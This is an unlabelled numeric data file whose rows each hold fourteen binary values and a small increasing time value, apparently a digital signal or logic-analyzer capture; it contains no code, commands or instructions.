0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7648280e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7648520e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7648600e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,9.7649040e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,9.7649320e-03 0,1,0,1,1,1,0,0,0,0,0,0,0,0,9.7649360e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7649400e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7649560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7649800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7650040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7650280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7650800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7651040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7651320e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7651560e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7652040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7652280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7652800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7653040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7653560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7653800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7654040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7654280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7654520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7654760e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7655040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7655320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7655560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7655800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7656040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7656280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7656520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7656800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7657040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7657320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7657560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7657800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7658040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7658280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7658520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7658800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7659040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7659320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7659560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7659800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7660040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7660280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7660520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7660760e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7661040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7661320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7661560e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7661800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7662080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7662360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7662600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7662840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7663080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7663320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7663600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7663840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7664120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7664360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7664600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7664840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7665080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7665320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7665600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7665840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7666120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7666360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7666600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7666840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7667080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7667320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7667600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7667840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7668120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7668360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7668600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7668840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7669080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7669320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7669600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7669840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7670120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7670360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7670600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7670840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7671080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7671320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7671600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7671840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7672120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7672360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7672600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7672840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7673080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7673320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7673600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7673840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7674120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7674360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7674600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7674840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7675080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7675320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7675600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7675840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7676120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7676360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7676600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7676840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7677080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7677320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7677600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7677840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7678120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7678360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7678600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7678840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7679080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7679320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7679600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7679840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7680120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7680360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7680600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7680840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7681080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7681320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7681600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7681840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7682120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7682360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7682600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7682840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7683080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7683320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7683600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7683840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7684120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7684360e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7684600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7684840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7685080e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7685320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7685600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7685840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7686120e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7686400e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7686640e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7686920e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,9.7687160e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,9.7687400e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,9.8930760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,9.8932760e-03 1,1,0,1,1,0,0,0,0,0,0,1,0,1,9.8933000e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,9.8933280e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,9.8936200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,9.8936480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,1,9.8936520e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,1,9.8937000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,1,9.8937240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,9.8937320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,9.8937480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,9.8937720e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,9.8937960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,9.8938200e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,9.8938440e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,9.8938720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,1,9.8938760e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8939080e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8939240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8939480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8939560e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8939720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8939960e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8940040e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8940480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8940720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8940800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8941000e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8941240e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8941480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8941720e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8941960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8942200e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8942440e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8942720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8942760e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8943240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8943480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8943560e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8943720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8943960e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8944040e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8944480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8944720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8944800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8945240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8945480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8945520e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8945720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8945960e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8946200e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8946440e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8946720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8946960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8947040e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8947480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8947720e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8947960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8948200e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8948720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8949000e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8949240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8949480e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8949720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8949960e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8950200e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8950440e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8950520e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8951000e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8951240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8951280e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8951720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8951960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8952040e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8952200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8952440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8952720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8952960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8953240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8953480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8953960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8954200e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8954280e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8954720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8955000e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8955040e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8955480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8955720e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8955960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8956200e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8956440e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8956720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8956760e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8956960e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8957240e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,9.8957280e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8957320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8957720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8957960e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8958040e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8958200e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8958440e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8958720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8958960e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8959240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8959480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8959560e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8959960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8960200e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8960480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8960720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8960760e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8961240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8961480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8961560e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8961960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8962200e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8962280e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8962480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8962720e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8962920e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8963240e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8963480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8963720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8963800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8964280e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8964520e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8964760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8965000e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8965480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8965720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8965800e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8966000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8966240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8966320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8966520e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8966760e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8967000e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8967240e-03 1,1,0,1,1,0,0,0,0,1,0,0,0,0,9.8967280e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8967320e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8967760e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8968000e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,9.8968040e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8968080e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8968240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8968520e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8968760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8969000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8969040e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8969240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8969480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8969560e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8970000e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8970240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8970280e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8970520e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8970760e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8971000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8971240e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,9.8971480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,9.8971720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8971800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8972200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8972480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8972720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8972960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8973240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8973480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8973720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8973960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8974200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8974440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8974720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8974960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8975240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8975480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8975720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8975960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8976200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8976440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8976720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8976960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8977240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8977480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8977720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8977960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8978200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8978440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8978720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8978960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8979240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8979480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8979720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8979960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8980200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8980440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8980720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8980960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8981240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8981480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8981720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8981960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8982200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8982440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8982720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8982960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8983240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8983480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8983720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8983960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8984200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8984440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8984720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8984960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8985240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8985480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8985720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8985960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8986200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8986440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8986720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8986960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8987240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8987480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8987720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8987960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8988200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8988440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8988720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8988960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8989240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8989480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8989720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8989960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8990200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8990440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8990720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8990960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8991240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8991480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8991720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8991960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8992200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8992440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8992720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8992960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8993240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,9.8993480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,9.8993720e-03 